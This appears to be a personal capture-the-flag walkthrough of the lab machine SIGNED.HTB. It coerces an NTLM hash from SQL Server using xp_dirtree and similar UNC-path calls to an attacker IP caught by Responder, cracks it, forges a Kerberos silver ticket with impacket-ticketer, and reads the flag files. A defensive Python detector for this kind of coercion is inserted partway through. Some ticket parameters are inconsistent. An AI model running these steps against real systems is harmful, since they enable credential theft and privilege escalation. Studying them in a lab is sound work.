
Signed - SQL - capture hash through SQL

lika@learning:~/Downloads/CVE-2024-8353$ impacket-mssqlclient scott:Sm230#C5NatH@$target
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (scott guest@master)> select '10.10.14.14/sharesss'

--------------------
b'10.10.14.14/sharesss'

SQL (scott guest@master)> select '10.10.14.14\sharesss'right

--------------------
b'10.10.14.14\\sharesss'

Start Responder on the local machine:

sudo responder -I tun0

Nothing happened with the plain SELECT, so run one of the following instead:

Option 1 — use xp_dirtree

This is the most common and stealthy way:

EXEC master..xp_dirtree '\\10.10.14.14\sharesss';

Option 2 — use xp_fileexist

Also works:

EXEC master..xp_fileexist '\\10.10.14.14\sharesss\test.txt';

Option 3 — use bulk insert

This one also triggers a remote connection:

BULK INSERT temp_table FROM '\\10.10.14.14\sharesss\data.txt';
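As an added defensive example (not part of these notes), a small Python detector for the pattern the three options above rely on: a file-access procedure handed a UNC path, so the SQL Server service account authenticates outbound to a host that is not an approved file server. The audit rows and the allow-listed host name FILES01 are constructed; the statement text is what a SQL Server audit or Extended Events session would record.

```python
import re

# Procedures/statements that make SQL Server open a path on the caller's behalf.
# Given a UNC path, the service account authenticates to that host over SMB,
# which is what the xp_dirtree / xp_fileexist / BULK INSERT options above rely on.
UNC_SINKS = re.compile(r"(?i)\b(xp_dirtree|xp_fileexist|bulk\s+insert|openrowset)\b")
# A UNC path \\host\share inside the statement; host may be an IP or a name.
UNC_PATH = re.compile(r"\\\\([A-Za-z0-9._-]+)\\([^\s'\"\\]*)")


def find_unc_coercion(statement):
    """Return (procedure, host, share) when a file-access sink is handed a UNC
    path, else None. Local paths such as C:\\... are deliberately not flagged."""
    sink = UNC_SINKS.search(statement)
    path = UNC_PATH.search(statement)
    if sink is None or path is None:
        return None
    proc = re.sub(r"\s+", " ", sink.group(1).lower())  # "BULK  INSERT" -> "bulk insert"
    return proc, path.group(1), path.group(2)


def scan_audit(records, allowed_hosts=frozenset()):
    """Run over audit rows (dicts with 'login' and 'statement') and return one
    alert per statement that coerces an SMB connection to a host outside the
    allow-list of legitimate file servers."""
    allowed = {h.lower() for h in allowed_hosts}
    alerts = []
    for row in records:
        hit = find_unc_coercion(row["statement"])
        if hit is None:
            continue
        proc, host, share = hit
        if host.lower() in allowed:
            continue
        alerts.append({"login": row["login"], "procedure": proc,
                       "host": host, "share": share})
    return alerts


# Constructed sample rows; FILES01 stands in for a legitimate internal file server.
SAMPLE_AUDIT = [
    {"login": "scott", "statement": "select '10.10.14.14\\sharesss'"},
    {"login": "scott", "statement": "EXEC master..xp_dirtree '\\\\10.10.14.14\\sharesss';"},
    {"login": "scott", "statement": "EXEC master..xp_fileexist '\\\\10.10.14.14\\sharesss\\test.txt';"},
    {"login": "scott", "statement": "BULK  INSERT temp_table FROM '\\\\10.10.14.14\\sharesss\\data.txt';"},
    {"login": "app", "statement": "BULK INSERT imports FROM '\\\\FILES01\\imports\\daily.csv';"},
    {"login": "SIGNED\\mssqlsvc", "statement": "SELECT * FROM OPENROWSET(BULK N'C:\\Users\\mssqlsvc\\Desktop\\user.txt', SINGLE_CLOB) AS t;"},
]

if __name__ == "__main__":
    for alert in scan_audit(SAMPLE_AUDIT, allowed_hosts={"FILES01"}):
        print(alert)
```

A low-privilege login (scott is only a guest in master here) issuing any of these is the signal worth alerting on; restricting EXECUTE on xp_dirtree/xp_fileexist to sysadmin and blocking outbound SMB from the SQL host remove the path entirely.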

After cracking the captured hash, log in with the recovered password:

impacket-mssqlclient mssqlsvc:'purPLE9795!@'@$target -windows-auth

Check whether the login has sysadmin rights:

SELECT IS_SRVROLEMEMBER('sysadmin');

Compute the NT hash of the password (MD4 over its UTF-16LE encoding); on OpenSSL 3 add -provider legacy -provider default, since MD4 lives in the legacy provider:

echo -n 'purPLE9795!@' | iconv -f UTF-8 -t UTF-16LE | openssl md4

If you have credentials or hashes, enumerate domain users and SIDs:

impacket-samrdump SIGNED.HTB/mssqlsvc:'password'@dc01.signed.htb

or

impacket-lookupsid SIGNED.HTB/mssqlsvc:'password'@dc01.signed.htb

Get the SID of the IT group from inside SQL Server (the domain SID is the prefix; the last component is the group's RID):

SELECT SUSER_SID('SIGNED\IT');

impacket-ticketer \
  -nthash $nthash \
  -domain-sid "$DOMSID" \
  -domain SIGNED.HTB \
  -spn MSSQLSvc/DC01.SIGNED.HTB \
  -groups 512,$IT_RID \
  -user-id $MSSQLSVC_RID mssqlsvc

impacket-ticketer \
  -nthash $nthash \
  -domain-sid "S-1-5-21-4088429403-1159899800-2753317549" \
  -domain SIGNED.HTB \
  -spn MSSQLSvc/DC01.SIGNED.HTB \
  -groups 512,1105 \
  -user-id 1105 mssqlsvc

Point Kerberos at the forged ticket: export KRB5CCNAME="$(pwd)/mssqlsvc.ccache"

Command: impacket-mssqlclient -k 'SIGNED.HTB/mssqlsvc@dc01.signed.htb' -windows-auth -no-pass

Then check whether the user has sysadmin rights.

User flag: SELECT * FROM OPENROWSET(BULK N'C:\Users\mssqlsvc\Desktop\user.txt', SINGLE_CLOB) AS t;

Root flag: SELECT * FROM OPENROWSET(BULK N'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) AS t;

SQL (SIGNED\mssqlsvc guest@master)> SELECT CURRENT_TIMESTAMP;

2025-11-24 18:30:14

SQL (SIGNED\mssqlsvc guest@master)> SELECT SYSDATETIMEOFFSET();

Set the local clock to match the server's time:

lika@learning:~/Downloads$ impacket-mssqlclient -k 'SIGNED.HTB/mssqlsvc@dc01.signed.htb' -windows-auth -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[-] ERROR(DC01): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
lika@learning:~/Downloads$ sudo date "2025-11-24 18:43:03"
[sudo] password for lika:
date: invalid date ‘2025-11-24 18:43:03’
lika@learning:~/Downloads$ sudo date -s "2025-11-24 18:43:03"
Mon Nov 24 06:43:03 PM +07 2025
lika@learning:~/Downloads$ impacket-mssqlclient mssqlsvc:'purPLE9795!@'@$target -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc guest@master)>

Command: SELECT * FROM OPENROWSET(BULK N'C:\Users\mssqlsvc\Desktop\user.txt', SINGLE_CLOB) AS t;

Command: SELECT * FROM OPENROWSET(BULK N'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) AS t;

impacket-ticketer \
  -nthash ef699384c3285c54128a3ee1ddb1a0cc \
  -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
  -domain SIGNED.HTB \
  -spn MSSQLSvc/DC01.SIGNED.HTB \
  -groups 512,1105 \
  -user-id 1105 mssqlsvc

By default, Responder stores captured hashes here:

/usr/share/responder/logs/

List the files:

ls -l /usr/share/responder/logs/

Responder remembers hashes it has already seen and will not print them again; delete its database to force a fresh capture:

sudo rm /usr/share/responder/Responder.db

impacket-ticketer \
  -nthash EF699384C3285C54128A3EE1DDB1A0CC \
  -domain-sid "S-1-5-21-4088429403-1159899800-2753317549" \
  -domain SIGNED.HTB \
  -spn MSSQLSvc/DC01.SIGNED.HTB \
  -groups 512,1105 \
  -user-id 1103 mssqlsvc

Shift the local clock forward to match the server's time, then check the rights of the new session:

sudo date -s "7 hours 31 minutes"

SELECT IS_SRVROLEMEMBER('sysadmin');